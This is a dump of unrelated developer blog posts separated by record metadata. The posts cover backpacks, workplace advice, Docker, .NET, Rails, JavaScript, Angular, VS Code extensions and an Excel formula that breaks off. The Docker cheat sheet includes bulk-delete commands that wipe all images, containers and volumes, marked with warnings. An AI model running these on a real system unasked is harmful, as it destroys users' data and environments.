The [Db Scholar](https://dbjourney.com/the-scholar-whiteout) is a great-looking backpack with a capacity of 17 liters. It has an internal laptop pocket that fits anything up to a 16” MacBook Pro and weighs 0.7 kg. The Scholar backpack costs €139 (~ $170) and comes with a two-year warranty.
### Peak Design Everyday

The [Peak Design Everyday](https://www.peakdesign.com/products/everyday-backpack?variant=29743300771884) is a popular backpack with a capacity of either 20 or 30 liters. It has a protective laptop sleeve that can fit up to a 15” laptop and additional compartments for camera gear. The Everyday backpack costs $259.95 for the 20L and $289.95 for the 30L. All Peak Design backpacks come with lifetime warranty that covers manufacturing defects and breakages.
### North Face Kaban

The [North Face Kaban](https://www.thenorthface.com/shop/kaban-nf0a2zek) is a sleek backpack with a capacity of 26 liters. It comes with a protective 15” laptop sleeve and weighs 1.2 kg. The Kaban backpack is made of polyester, has a big front compartment, and costs $129. All North Face backpacks come with a limited lifetime warranty.
### Osprey Arcane Large Day

The [Osprey Arcane Large Day](https://www.osprey.com/us/en/product/arcane-large-day-ARCANLGDAYS20.html) is a recycled polyester backpack (made of 10.5 plastic bottles) with a capacity of 20 liters. It has a 15” laptop sleeve that’s easily accessible because of the large zip. The Arcane Large Day comes in at a light 0.64 kg and costs $100. Osprey repairs any damage or defect to your backpack free of charge.
### eBags Pro Slim

The [eBags Pro Slim](https://www.ebags.com/backpacks/laptop-backpacks/pro-slim-laptop-backpack/117775XXXX.html) is a polyester backpack that fits a laptop up to 17”. The backpack has a padded air-mesh back panel and pass-through sleeves that can secure your bag onto rolling luggage. It weighs 1.8 kg, costs $79.99, and has a limited lifetime warranty.
### Timbuk2 Authority Deluxe

The [Timbuk2 Authority Deluxe](https://www.timbuk2.com/products/1825-authority-laptop-backpack-deluxe?variant=31334648152106) is a light, but sturdy backpack that has a capacity of 28 liters. It weighs 1 kg and fits most 15-17” laptops and tablets. It has several compartments, an airmesh back panel, and padded straps for extra comfort. The backpack costs $139 and comes with lifetime warranty.
### Bellroy Classic

The [Bellroy Classic](https://bellroy.com/products/classic-backpack/nylon/black#slide-0) is a 20-liter backpack made for urban travelers. It is made of recycled water bottles, holds laptops up to 16”, and has a water-resistant top pocket for your phone and keys. It weighs 0.75 kg and costs either $89 or $139 depending on the color you choose. The Bellroy Classic has a 3-year warranty.
### Patagonia Arbor Daypack

The [Patagonia Arbor Daypack](https://www.patagonia.com/product/arbor-daypack-20-liters/48016.html?dwvar_48016_color=FGE&cgid=luggage-laptop-bags) is a small, light backpack that weighs only 0.42 kg and has a capacity of 20 liters. It has a padded laptop sleeve that fits most 15” laptops and is made of recycled polyester fabric that’s water-resistant. The backpack costs $89 or $34.99 if you choose the geode purple cover.
### Aer Day Pack 2

The [Aer Day Pack 2](https://www.aersf.com/day-pack-2-black) is a nylon, weather-resistant backpack that weighs 1.32 kg. It has a capacity of 14.8 liters and can fit any laptop up to a 16” MacBook Pro. The backpack has a mesh back panel and quality YKK zippers. Aer products come with lifetime warranty.
### Ethnotek Raja

The [Ethnotek Raja](https://ethnotek.com/products/30-liter-backpack?variant=37004849742) is a beautiful, ethically sound backpack with a capacity of 30 liters. The Ethnotek Raja is made of traditional handmade textiles and can fit up to a 17” MacBook Pro. The backpack is waterproof, has YKK zippers, and weighs 0.9 kg. All Ethnotek products are eligible for a full refund if there’s a defect to the material or workmanship of the product. | tdmoor |
710,373 | On Good Coworkers & Business Humility | “What makes a good coworker in tech? What makes a bad one?” I saw these two questions posted in a... | 0 | 2022-02-11T19:58:07 | https://theagilecouch.com/2020/05/22/on-good-coworkers-business-humility/ | uncategorized | ---
title: On Good Coworkers & Business Humility
published: true
date: 2020-05-22 19:52:46 UTC
tags: Uncategorized
canonical_url: https://theagilecouch.com/2020/05/22/on-good-coworkers-business-humility/
---
> **“What makes a good coworker in tech?
> What makes a bad one?”**
I saw these two questions posted in a coding forum today as part of JC Smiley’s daily questions, which he then reposts with the answers to [his LinkedIn feed](https://www.linkedin.com/in/jcsmileyjr/). If you’re getting started in development, you should follow him.
**“What traits or actions would make a horrible co-worker in tech?”**
**“What traits or actions would make a fantastic co-worker in tech”**
I read the replies so far, as I considered my answers. The answers were good examples of specific characteristics:
- No respect for others
- Pushes work onto others
- Doing the minimal amount of work
- Negativity
- Know-it-alls
- Doesn’t ask questions when they need help
- Advance themselves at the expense of others
- “Holds an entire team hostage for their personal predilections” (#suspiciouslyspecific)
- Seeks all the glory for themselves
- Makes every meeting longer than it needs to be
- Doesn’t come through on their responsibilities
The respondents often mentioned specifically that their examples of what makes a great coworker were the exact opposite traits. Which is not surprising, although there’s no reason to assume they are diametrically opposed:
- Willing to help and share knowledge
- Leads by example
- Willing to go above and beyond just because that’s what a good human being should do
- Open to ideas
- Open to discussion
- Good personality
- Asks questions when they need help and gets things done as a result
- Enjoys learning and talking about new things
- The person who makes others better
- Exhibits servant leadership before they have the leadership title
- Being a decent person and treating others like one
I always think about patterns and root causes, and I thought particularly about this as a business-context specific question. We’re not looking for what makes a good person, but a good coworker. Mr. Rogers was an amazing person, but would he make a great DevOps Engineer? I don’t know. The mention of good personality also made me wonder, does being a good coworker require someone to be a good person in general? Is it important to enjoy playing couch co-op Super Mario Party with a coworker? Is the person you’ve shared the most beer with going to make a great coworker?
I believe in philosophy as a core element of business, and one almost entirely overlooked on a daily routine at least. What I believe makes a person a good coworker is what makes a good business, a singular goal; capital T, capital G— The Goal, and alignment with that goal. We form businesses or other organizations as “machine made out of people” to accomplish some specific end. Whether The Goal is revenue, profit, literacy, health outcomes, or saturating North Korea with wifi access, a lack of transparency and alignment with The Goal is a detriment. The lack of a clearly expressed goal allows individuals within the company to implicitly, perhaps accidentally, pursue independent goals. Alignment with The Goal is a requirement for a coherent and cohesive organization. You may not personally value elbowing someone in the ribs, but if your context is the NBA, if you can’t be aligned with that goal, you don’t belong in that context. The Goal should be so clear that everyone can remember it and quote it easily. So transparent that anyone can point to it on the wall when any debate about decisions is being waged. The Goal should clarify, align, and take out the garbage.
I’m coining as “Business Humility” the specific context of subsuming personal characteristics, goals, and fears to an alignment with The Goal. I am not making a case for slavish devotion to a business, or allowing personal goals to be flattened by a corporate behemoth. I say alignment, which should suggest pursuit of The Goal also accomplishes personal goals along the same path. The coworker who is aligned with the company goal does not have room in his personal philosophy for a fear of being replaced if he shares his technical knowledge with others. He doesn’t need to hoard glory. When a front-end designer makes the decision to initiate a pair programming session, navigating while a junior developer drives from the keyboard, she is showing servant leadership, sharing, teaching, and alignment with the company goals by increasing the bandwidth of her skill set.
A bad coworker is someone who is essentially saying through their actions, “The company exists to provide for my personal goals.”
A good coworker recognizes that alignment with the company means both parties benefit from the trade. Aligning with a clear and transparent goal, and the business humility displayed is the foundation of being a good coworker. | stevetwips |
710,395 | Made a Real Time Chat Application using React.js | 1.This is a fully functional Real time Chat Application made using React.js with functionalities like... | 0 | 2021-05-27T17:04:10 | https://dev.to/bhavesh1235/made-a-real-time-chat-application-using-react-js-1nni | react, webdev, javascript, css | 1. This is a fully functional **real-time chat application** made using React.js, with functionality like online status, image support, read receipts, and multiple rooms.
2. Link to the **GitHub repo** -> [Link](https://github.com/bhavesh1235/React-Chat-App)
If you like the project, please give it a **star** on GitHub.
3. The backend is hosted by [https://chatengine.io](https://chatengine.io)
| bhavesh1235 |
710,446 | Some Docker commands make your life easier | In this post, I show some useful docker commands that you may be less familiar with them and they mak... | 0 | 2021-05-27T18:16:51 | https://dev.to/moesmp/some-docker-commands-make-your-life-easier-1ob6 | In this post, I show some useful Docker commands that you may be less familiar with and that will make your life easier as a developer. Let's begin with the build command:
```shell
docker build -f path/to/file/Dockerfile -t image-name .
```
##### `-f` lets you specify the path to `Dockerfile`.
#### Tag or rename image
```shell
docker tag old-image-name new-image-name
```
###### You can use the image ID rather than the image name:
```shell
docker tag 0e5574283393 new-image-name
```
#### Save image:
```shell
docker save image-name -o output-image-name
```
###### If the image name contains `/`:
```shell
docker save image-name/image-name > output-image-name
```
#### Load image:
```shell
docker load --input output-image-name
```
#### Remove images whose names start with `myimage`
```shell
docker rmi $(docker image ls 'myimage*' -q)
```
###### Deletes images whose names start with `myimage`.
#### Delete all untagged images
```shell
docker rmi $(docker images -f "dangling=true" -q)
```
#### Delete all images (warning)
```shell
docker rmi -f $(docker images -q)
```
#### Start all stopped containers
```shell
docker start $(docker ps -aq)
```
#### Stop all running containers
```shell
docker stop $(docker ps -q)
```
#### Delete all containers
```shell
docker rm $(docker ps -aq)
# or
docker container stop $(docker container ls -aq) && docker system prune -af --volumes
```
#### Delete any resources — images, containers, volumes, and networks — that are dangling (warning)
```shell
docker system prune
```
#### Delete any stopped containers and all unused images (warning)
```shell
docker system prune -a
```
#### Copy file to container
```shell
docker cp ./path/to/file.ext container-name:/path/to/destination/inside/container
```
#### Build an image from a running container
```shell
docker commit container-name image-name:tag
```
#### Mount a file to a container
```shell
docker run -v /path/to/file/appsettings.json:/app/appsettings.json --name my-image image-name
```
#### Get into a Docker container's shell
```shell
docker exec -it container-name /bin/bash
```
#### Display volumes with mounted paths
```shell
docker ps --format 'table {{.ID}}\t{{.Names}}\t{{.Image}}\t{{.Mounts}}'
```

#### Delete volumes whose names start with `myvolume`
```shell
docker volume rm $(docker volume ls --filter name=myvolume -q)
```
#### Delete dangling volumes
```shell
docker volume rm $(docker volume ls -f dangling=true -q)
```
#### Build docker-compose from several files
```shell
docker-compose -f docker-compose.yml -f docker-compose.dev.yml build
```
#### Scale a service
```shell
docker-compose scale service-name=2
```
**Commands that contain `$` cannot be executed in the Windows command prompt (cmd); use `PowerShell` instead.** | moesmp | |
710,465 | [Quick Tip] Improving developer experience with Options Pattern validation on start. | When we're new or have less contact with some project is hard to understand all configuration possibi... | 0 | 2021-05-27T18:53:49 | https://dev.to/antoniofalcaojr/quick-tip-improving-developer-experience-with-options-pattern-validation-on-start-3ac2 | dotnet | When we're new to a project, or have had little contact with it, it's hard to understand all of its configuration possibilities.
**Options pattern** is the most appropriate way to inject environment settings into the application. Isolating the options by scenario adheres to important software engineering principles, such as the *Principle of Interface Segregation (ISP)* and *Separation of Concerns*.
Validating the options is a good way to indicate what is wrong, or how the settings fall outside expectations. But until **.NET 5**, the interruption produced by validation was only thrown at run time.
From **.NET 6** it is possible to enforce the options validation check on start rather than at runtime, with the `ValidateOnStart()` extension method from `OptionsBuilder<TOptions>`.
Below is a simple example using `ValidateDataAnnotations()` and `ValidateOnStart()`:
```c#
public static class ServiceCollectionExtensions
{
public static OptionsBuilder<ApplicationOptions> ConfigureApplicationOptions(
this IServiceCollection services, IConfigurationSection section)
=> services
.AddOptions<ApplicationOptions>()
.Bind(section)
.ValidateDataAnnotations()
.ValidateOnStart();
}
```
And the usage in StartUp:
```c#
services.ConfigureApplicationOptions(
_configuration.GetSection(nameof(ApplicationOptions)));
```
`ApplicationOptions` defining property as **Required** and **URL**:
```c#
public class ApplicationOptions
{
[Required, Url]
public string HttpClientAddress { get; init; }
}
```
`AppSettings` setting the address wrongly on purpose:
```json
{
"ApplicationOptions": {
"HttpClientAddress" : "localhost"
}
}
```
And then, when running the application, validation throws the error at startup:
```log
Microsoft.Extensions.Options.OptionsValidationException:
DataAnnotation validation failed for members: 'HttpClientAddress'
with the error: 'The HttpClientAddress field is not a valid
fully-qualified http, https, or ftp URL.'.
```
As we can see, the error is pretty clear and points us toward solving the problem.
### Another validation approach
*Data Annotations* is not the only way to validate the options. The `Validate()` method provides a delegate `Func<TOptions, bool>` that allows any kind of validation strategy.
This sample uses the library **Fluent Validation** with `InlineValidator<T>` just to exemplify:
```c#
=> services
.AddOptions<ApplicationOptions>()
.Bind(section)
.Validate(options =>
{
var validator = new InlineValidator<ApplicationOptions>();
validator
.RuleFor(applicationOptions => applicationOptions.HttpClientAddress)
.NotNull()
.NotEmpty()
.WithMessage("HttpClientAddress must be informed");
return validator
.Validate(options, strategy => strategy.ThrowOnFailures())
.IsValid;
})
.ValidateOnStart();
```
### Conclusion
This tool is as simple as it is powerful, helping to provide a better development environment. | antoniofalcaojr |
710,587 | Accessing Nested Resources Through Fetch Requests | My fourth project for FlatIron was the most challenging so far, but learned so much about JS and work... | 0 | 2021-05-27T20:53:45 | https://dev.to/rickysonz/accessing-nested-resources-through-fetch-requests-with-a-has-many-through-relationship-op9 | My fourth project for FlatIron was the most challenging so far, but I learned so much about JS and working with a back-end server. In this blog we will review a way to access nested resources and manipulate an API's JSON responses to retrieve specific nested data to present with JS in the front end of the program.


#### Schema in Rails
Library has many Songs through Liked Songs
Songs have many Libraries through Liked Songs
Liked Songs belong to Library/ Song
The schema in Rails says that this Liked Song does not have any attributes of a Song like name, artist, etc., as it is purely a relationship table on the back end. But when looking at the JS class that is Liked Song, it does include all of those attributes. This is made possible because of Rails' ability to render JSON that includes nested resources, as well as ES6 classes and constructors in JavaScript.

By utilizing `render json:` with the `include:` option, Rails will pass back not only the Liked Song relationship information but also the nested Song information. Basically, the way we constructed the JSON response for Liked Songs in Rails means it will always have Song information nested in it.

When a JSON response comes back, this function iterates through the Liked Song INDEX array and pulls the Song value from each Liked Song. The front end knows to do this because, while iterating, the song attribute hash is accessed with **object[i].song**. Here `object` is a variable for the JSON response and `object[i]` refers to the current instance of the iteration. The Song value is then pulled by **calling the `.song` attribute on the response.**
The front end then instantiates new instances of a Liked Song from the Song information in this response, as the constructor parameters are satisfactory for a new Liked Song. It is key to remember that with a Rails API you are controlling this information that comes back to your front end through the render at the end of your controller method. If you initialize Rails models and controllers through `rails generate`, they will not automatically render these nested resources even if relationships were set properly upon migration.
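A minimal sketch of that flow (the response shape and class fields here are assumptions mirroring the article, not the project's actual code):

```javascript
// Hypothetical JSON response shape: each liked-song record nests its song's attributes.
const response = [
  { id: 1, song: { name: "Song A", artist: "Artist A" } },
  { id: 2, song: { name: "Song B", artist: "Artist B" } },
];

// Front-end class whose constructor accepts the nested song attributes.
class LikedSong {
  constructor({ name, artist }) {
    this.name = name;
    this.artist = artist;
  }
}

// Pull the nested song out of each record and instantiate front-end objects.
const likedSongs = response.map((record) => new LikedSong(record.song));
console.log(likedSongs.map((s) => s.name)); // [ 'Song A', 'Song B' ]
```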

One other key thing to keep in mind is where the fetch calls are being sent, and if your routes are set up properly to handle this. In this project I left Liked Songs under Libraries which were under Users. Ensure that you make the fetch call to the right route and with the proper method in order to end up rendering your desired nested resources. **Saving data such as IDs to simulate a logged in experience is possible through using Local Storage and Session Storage.**


At this point it really is up to the developer how they want to utilize and present this information from this relationship map. For example, my application was essentially a mock Spotify Library, and if a Song was liked by a User, it would re-render all of the Liked Songs in the library so that it would include the new Liked Song. Another example could be an apartment finding site where a User class can like an Apartments Class that is kept track of in LikedApartments Class. When passing back a Liked Apartment, you can also pass the Apartment info.

| rickysonz | |
710,593 | Finding the Longest Word in a String | Let's return the length of the longest word in the provided sentence. Also the response should be a... | 0 | 2021-05-27T21:03:16 | https://dev.to/rthefounding/finding-the-longest-word-in-a-string-35o7 | javascript, tutorial, beginners, webdev | * Let's return the length of the longest word in the provided sentence.
* Also the response should be a number in this instance.
```
function findLongestWordLength(str) {
return str.length;
}
findLongestWordLength("The quick brown fox jumped over the lazy dog");
```
* Answer:
```
function findLongestWordLength(str) {
let words = str.split(" ");
let longest = "";
for (let i = 0; i < words.length; i ++) {
let tempLong = words[i];
if (tempLong.length > longest.length) {
longest = tempLong;
}
}
return longest.length;
}
findLongestWordLength("The quick brown fox jumped over the lazy dog"); // will display 6
```
#### Code Explanation
* Take the string and convert it into an array of words. Declare a variable to keep track of the longest word found so far and loop from 0 to the length of the array of words.
* Then check for the longest word by comparing the current word's length to the length of the longest word stored, and store the new longest word when it is longer. At the end of the loop just return the length of the variable `longest`.
### OR
```
function findLongestWordLength(str) {
let words = str.split(" ");
let longest = "";
for (let word of words) { // <-----
if (word.length > longest.length) {
longest = word;
}
}
return longest.length;
}
findLongestWordLength("The quick brown fox jumped over the lazy dog");
```
* Here instead of the for loop that loops through the indexes we loop through the elements themselves.
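* A more compact functional alternative that returns the same result:

```javascript
function findLongestWordLength(str) {
  // Map each word to its length, then take the maximum.
  return Math.max(...str.split(" ").map((word) => word.length));
}

console.log(findLongestWordLength("The quick brown fox jumped over the lazy dog")); // 6
```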
| rthefounding |
710,655 | Your Angular code base is deprecated. | No, upgrading to Angular 12.x.x will not help. It's still deprecated. The Typescript experimental de... | 0 | 2021-05-27T23:27:40 | https://dev.to/shivamd20/your-angular-code-base-is-deprecated-315e | angular, javascript, typescript, decorators | No, upgrading to Angular 12.x.x will not help.
It's still deprecated.
The Typescript experimental decorators were based on [TC39 proposal-decorators](https://github.com/tc39/proposal-decorators).
We use the same Decorators in our Angular codebase to create services, components and other Angular constructs.
But the same TC39 proposal has evolved in a different direction which is semantically not compatible with the experimental Typescript decorators.
The new spec for Decorators is easier to use and write.
This draft is still in stage-2 and may again change in the future.
You can find the detailed comparison between old and new decorators [here](https://github.com/tc39/proposal-decorators#comparison-with-typescript-experimental-decorators).
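To make the semantic gap concrete, here is a hedged sketch of the two class-decorator shapes, applied manually since each syntax needs different compiler settings (the decorator names are invented for illustration):

```typescript
// Legacy (experimentalDecorators) class decorator: called with the constructor only.
function legacySealed(ctor: Function): void {
  Object.seal(ctor);
}

// New TC39 proposal shape: called with the value plus a context object.
function modernSealed(
  value: Function,
  context: { kind: string; name: string | undefined }
): Function {
  if (context.kind === "class") Object.seal(value);
  return value;
}

class Example {}

// Applying both by hand to show the differing call signatures.
legacySealed(Example);
modernSealed(Example, { kind: "class", name: "Example" });

console.log(Object.isSealed(Example)); // true
```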
<blockquote class="twitter-tweet"><p lang="en" dir="ltr">Just finished up the first draft of the new decorators spec, pretty excited about it 😄 <a href="https://t.co/ELhZbsiaiR">https://t.co/ELhZbsiaiR</a></p>— The p is silent (@pzuraq) <a href="https://twitter.com/pzuraq/status/1397716184867295232?ref_src=twsrc%5Etfw">May 27, 2021</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
<blockquote class="twitter-tweet"><p lang="en" dir="ltr">Does this mean that Typescript experimental decorators will not be compatible with Javascript decorators 😨</p>— Shivam (@Shivamd20) <a href="https://twitter.com/Shivamd20/status/1398043762664693760?ref_src=twsrc%5Etfw">May 27, 2021</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
<blockquote class="twitter-tweet"><p lang="en" dir="ltr">Unfortunately no, the new proposal has differing semantics from previous proposals in a number of ways. TypeScript experimental decorators were also incompatible with the Define semantics class fields, which caused a decent amount of breakage in the ecosystem.</p>— The p is silent (@pzuraq) <a href="https://twitter.com/pzuraq/status/1398044922645671936?ref_src=twsrc%5Etfw">May 27, 2021</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
<blockquote class="twitter-tweet"><p lang="en" dir="ltr">When the proposal advances, figuring out a step-by-step incremental upgrade path for existing decorators users is definitely going to be a priority though! No user left behind 😄</p>— The p is silent (@pzuraq) <a href="https://twitter.com/pzuraq/status/1398045108805640195?ref_src=twsrc%5Etfw">May 27, 2021</a></blockquote> <script async src="https://platform.twitter.com/widgets.js" charset="utf-8"></script>
Let's just hope that this doesn’t result in fragmentation of JavaScript decorators. We have already faced a lot of inconvenience due to [CommonJS and ES6 imports](https://stackoverflow.com/questions/52567493/why-node-uses-require-not-import). | shivamd20 |
710,750 | Build an idea generator from scratch, part 1: Project setup with Github and dotenv [Video] | So as I was finishing up teaching my web development class last year, I really wanted to give my... | 0 | 2021-05-28T01:32:45 | https://dev.to/ashleykolodziej/build-an-idea-generator-from-scratch-part-1-project-setup-with-github-and-dotenv-video-34mn | video, javascript, tutorial, codenewbie | {% youtube TqdmUdi8xbY %}
So as I was finishing up teaching my web development class last year, I really wanted to give my students something to help them continue growing and learning. I decided to build an idea generator with HTML, CSS, and JavaScript using the [raindrop.io API](https://developer.raindrop.io/), and now, I’m finally getting around to posting the process recordings. Woohoo! I’ll be posting a new recording each week.
In this first part of the tutorial, we'll set up a Github repository, get our template code set up, and install dotenv, a library which will help us make an authenticated call to the API securely. You'll also see your first introduction to Git Flow. I use Tower to make things a little easier, but you can use any method of interacting with git you like. This would be a great intermediate JavaScript challenge for someone looking to practice ES6 syntax!
## This video covers:
- How to set up a new repository in Github using a template
- How to clone a remote Github repository to your computer
- How to use Git Flow to create a feature branch
- How to make an authenticated call to an API using JavaScript
- How to use dotenv to store access tokens and other sensitive information in your app without committing it to your codebase
... and so much more!
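As a rough sketch of the dotenv idea covered in the video (the `RAINDROP_TOKEN` variable name is a hypothetical example, not from the project):

```javascript
// Load .env into process.env when dotenv is installed; the try/catch keeps this
// sketch runnable even where the package isn't available.
try {
  require("dotenv").config();
} catch (err) {
  // dotenv not installed; fall back to whatever is already in process.env
}

// RAINDROP_TOKEN is a hypothetical variable name you would keep in .env
// (and out of version control via .gitignore).
const token = process.env.RAINDROP_TOKEN || "missing-token";

// The token travels in an Authorization header instead of living in committed code.
const headers = { Authorization: `Bearer ${token}` };
console.log(headers.Authorization.startsWith("Bearer ")); // true
```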
## The final product
In this series, we’ll be working toward [this idea generator](https://professorkolodziej.github.io/idea-generator/) as our final product.
## Code links
Follow along by cloning or forking the main branch here: https://github.com/ProfessorKolodziej/idea-generator
You can also start on your own project by using my Student Site Boilerplate template: https://github.com/ProfessorKolodziej/student-site-boilerplate/
**[Catch the new video over here.](https://youtu.be/TqdmUdi8xbY)** Happy coding!
---
**I'm always happy to connect!**
🐰 [@ashleykolodziej on Twitter](https://twitter.com/ashleykolodziej)
🐰 [Subscribe to Professor K Explains on YouTube](https://www.youtube.com/c/ProfessorKExplains?sub_confirmation=1) | ashleykolodziej |
711,073 | Notion template to organize your chords 🎸and learning guitar | Hey folks 👋🏼 We just launched another Product on Product Hunt. It's a notion template that helps you... | 0 | 2021-05-28T10:55:12 | https://dev.to/xenoxdev/notion-template-to-organize-your-chords-and-learning-guitar-4j6a | watercooler, showdev | Hey folks 👋🏼
We just launched another Product on Product Hunt. It's a notion template that helps you to organize your chords and learn guitar
### Learn Guitar
An amazing template to make your dreams of playing that dreamy song on your own come true. This template will help you keep track of your guitar learning progress.
{% youtube zYcRf5VIsk0 %}
It contains two databases:
* Chords
* My Songs
### Chords
It contains all the chords identified with a name, an image, and your learning progress. This template is complete with a feature that will add a new chord with its status set to Next.

### Chords Views
The Chords Collection lets you choose from database, learning status, and chords gallery, showcasing how many chords you have collected so far!
**Chord Gallery View**

**Board View**

### My Songs
It contains all the songs you like and want to practice, identified with the title, artist, learning status bar and the list of chords that are required to play it. (related to the 🎼Chords database). New songs can be added with the provided template. It will automatically create a song with Next status and add the gallery and table views along with all the other sections.

**Detailed View**
Inside the song page, a detailed view of the song with a linked database showing the chords gallery is provided along with the chords table, followed by the embedded video and audio of the song, and the lyrics.
It also has a comments field so you can add your personal notes.

### My songs Views
You have the freedom to choose from List, database, and Learning Status view, to track your progress in real-time
**List View**

**Board view**

### Want One?

***Here is your link*** 👉 [***Learn Guitar***](https://prototion.com/notion-template/Learn-Guitar-WiaqM2TMIVAv1qCF)
We are on Producthunt today. Go show some love here🔥
[](https://www.producthunt.com/posts/notion-guitar-learning)
| sarthology |
711,459 | 12 Best VS Code Extensions To Enhance Your Productivity | Visual Studio Code is one of the well-known and most widely used code editors in the developer commun... | 0 | 2021-05-28T16:40:17 | https://dev.to/coursesity/12-best-vs-code-extensions-to-enhance-your-productivity-4ok | vscode, codenewbie, 100daysofcode, programming | Visual Studio Code is one of the well-known and most widely used code editors in the developer community. The reason for its popularity is its numerous extensions that speed up the development process. But, one of the best things about VS code is its customizability, primarily via extensions.
So, this article involves an overview of the 12 best extensions for VSCode that will make you a more productive developer. Here's a list of extensions we will cover in this article:
- Auto Rename Tag
- Snippets
- GitLens
- Icons
- Import Cost
- Prettier
- Markdown All in One
- Better Comments
- Profile Switcher
- Bracket Pair Colorizer
- Debugger for Chrome
- Settings Sync
### **1. [Auto Rename Tag](https://marketplace.visualstudio.com/items?itemName=formulahendry.auto-rename-tag)**

As the name implies, Auto Rename Tag renames the second tag as the first one is updated and vice versa. This extension is not only beneficial for HTML but also for React since it works with JSX. It is a super helpful VS Code extension for web developers.
### **2. [Snippets](https://code.visualstudio.com/docs/editor/userdefinedsnippets)**

The best way to save time and boost productivity is to use Snippets. It is not one extension but a collection of extensions with various snippets for several programming languages. Some popular code snippets extensions include:
- Python
- Vue 3 Snippets
- ES7 React/Redux/GraphQL/React-Native snippets
- HTML Snippets
- JavaScript (ES6) code snippets
- Angular Snippets (version 11)
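For illustration, a user-defined snippet in VS Code's snippets JSON looks like this (the `log` prefix and body are just an example, not tied to any extension above):

```json
{
  "Print to console": {
    "prefix": "log",
    "body": ["console.log('$1');", "$2"],
    "description": "Log output to console"
  }
}
```

Typing the prefix in a matching file then offers the snippet as a completion, with `$1` and `$2` as tab stops.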
### **3. [GitLens](https://marketplace.visualstudio.com/items?itemName=eamodio.gitlens)**

Developed and maintained by Eric Amodio, GitLens is an open-source extension for Visual Studio Code. It combines the capabilities of Git and VS Code. Therefore, one of the best features of this extension is its ability to visualize code authorship through Git blame annotations and code lens. Some other essential features include:
- A **status bar blame** annotation shows the commit and author who last modified the current line.
- Smooth **Revision navigation** (backward and forward) through the history of a file.
- An unpretentious **current line blame** annotation at the end of the line shows the commit.
### **4. [Icons](https://marketplace.visualstudio.com/items?itemName=vscode-icons-team.vscode-icons)**

The use of descriptive icons can help you differentiate between files and folders. They also make development more enjoyable. Although there are many icons extension that you can choose from, the following icons are the most popular:
- Material Icon Theme
- Simple icons
- vs-code icons
- Material Theme Icons
### **5. [Import Cost](https://marketplace.visualstudio.com/items?itemName=wix.vscode-import-cost)**

The Import Cost extension shows you the estimated size of an imported package in your code. While working on a project, it's essential not to jeopardize the user experience by importing hefty packages. You can dodge this by keeping track of the size of additional dependencies in your code.
Import Cost warns you if the import is too large by highlighting it in red. You can select whether the import should be considered small, medium, or large.
### **6. [Prettier](https://marketplace.visualstudio.com/items?itemName=esbenp.prettier-vscode)**

With more than 38.5k stars on GitHub, Prettier is one of the most popular code formatters available. Consistent formatting and styling across your code can save you a lot of time, especially when working with other developers.
The extension is compatible with Prettier plugins when used with a locally resolved version of Prettier. You can further customize this extension to meet your formatting needs and trigger it with autosave.
### **7. [Markdown All in One](https://marketplace.visualstudio.com/items?itemName=yzhang.markdown-all-in-one)**

Since the release of Markdown in 2004, it has become one of the most popular markup languages. Thanks to its lightweight simplicity and cross-platform usage, it is widely preferred by technical writers. Markdown All in One is an individual extension that fulfills all your markdown needs, such as auto-preview, shortcuts, autocomplete, etc.
For example, if you want to bold some text in Markdown, all you have to do is select the text and press Ctrl+B.
### **8. [Better Comments](https://marketplace.visualstudio.com/items?itemName=aaron-bond.better-comments)**

Better Comments extension helps you write more human-friendly comments in your code. Precise and digestible comments are advantageous not only for someone going through your code but also for you. It's not uncommon for developers to get lost in their code after some time. Having descriptive comments can save you and your team a lot of time.
You can categorize the annotations you make with Better Comments VS Code into alerts, queries, to-dos, highlights, etc. After a double forward-slash (//), you can use either of the following characters.
- (!) for errors and warnings
- (//) for strikethrough
- TODO for to-dos
- (*) for highlighted text
- (?) for queries and questions
### **9. [Profile Switcher](https://marketplace.visualstudio.com/items?itemName=aaronpowell.vscode-profile-switcher)**

Profile Switcher allows you to set up and switch between multiple profiles in VS Code with different settings and configurations. You can switch to a profile with the settings a project requires instead of having to change your settings manually every time.
### **10. [Bracket Pair Colorizer](https://marketplace.visualstudio.com/items?itemName=CoenraadS.bracket-pair-colorizer)**

Bracket Pair Colorizer extension matches corresponding brackets with the same color. It can be baffling to have multiple parentheses, brackets, etc., in a file containing nested components, functions, objects, etc.
### **11. [Debugger For Chrome](https://marketplace.visualstudio.com/items?itemName=msjsdiag.debugger-for-chrome)**

The Debugger for Chrome is an extension developed by Microsoft that lets you debug your JS code in VSCode. It's surprisingly smooth compared to debuggers in other IDEs. This tool lets you set breakpoints, step through the code and debug dynamically added scripts.
### **12. [Settings Sync](https://marketplace.visualstudio.com/items?itemName=Shan.code-settings-sync)**

With the Settings Sync extension, you can sync most of your settings on VSCode to Github, including keyboard shortcuts and other extensions for VSCode.
> With Github, programmers can easily update their code and track how their work keeps evolving. Therefore, if you are just starting out with programming, it is highly recommended that you [learn Git](https://blog.coursesity.com/best-git-tutorials/).
By doing this, you'll have access to your preferred IDE on any device you like, instead of having to work in a vanilla VSCode environment on new devices or having to set everything up again manually.
If you have made it this far, then certainly you are willing to learn more. Here are some more topics that we think will be interesting for you.
- [11 Finest Java IDEs You Can Use In 2021](https://code.coursesity.com/best-java-ides)
- [50 Best SQL Interview Questions to Crack Your Next Interview Round](https://code.coursesity.com/sql-interview-questions)
- [50 Most Asked Python Interview Questions You Should Know in 2021](https://code.coursesity.com/python-interview-questions) | yashtiwari1k |
711,475 | Excel Formulas to Calculate the Time Duration With Number of Days!! | Have you ever tried to calculate the total time duration with the number of days in Excel? This artic... | 0 | 2021-05-29T03:00:26 | https://geekexcel.com/excel-formulas-to-calculate-the-time-duration-with-number-of-days/ | excelformula, excelformulas | ---
title: Excel Formulas to Calculate the Time Duration With Number of Days!!
published: true
date: 2021-05-28 14:46:48 UTC
tags: ExcelFormula,Excelformulas
canonical_url: https://geekexcel.com/excel-formulas-to-calculate-the-time-duration-with-number-of-days/
---
Have you ever tried to calculate the total **time duration with the number of days in Excel**? This article will show you some methods to achieve it. Let’s jump into this article!! Get an official version of **MS Excel** from the following link: [https://www.microsoft.com/en-in/microsoft-365/excel](https://www.microsoft.com/en-in/microsoft-365/excel)
*Time duration with days*
## Generic Formula:
- Use the below formula to calculate the time duration with the number of days, hours, and minutes.
**=days+[TIME](https://geekexcel.com/how-to-use-time-function-in-excel-365/)(hh,mm,0)**
## Syntax Explanations:
